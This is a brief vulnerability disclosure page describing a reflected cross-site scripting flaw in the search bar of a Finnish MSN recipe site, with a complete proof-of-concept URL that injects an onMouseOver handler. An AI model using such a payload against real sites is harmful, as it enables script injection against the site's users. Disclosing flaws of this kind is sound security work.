Finland MSN XSS Vulnerability

Loading...XSS1380

Overview

The search bar on this page fails to encode the quotes (") and as a result a onMouseOver event tag can be attached to the search bar which allows an XSS attack to occur.

Code:

http://ideakeittio.fi.msn.com/ruokaohjehaku/
?q=" onMouseOver=alert(/XSS/) "
&mealtypes=suolaiset
&mealtypes=leivonta-2
&main_ingredient=1

Display Name(required)Email(will not be published)(required)

Comments

There are no comments yet. Be the first to add one!

Overview

Leave a comment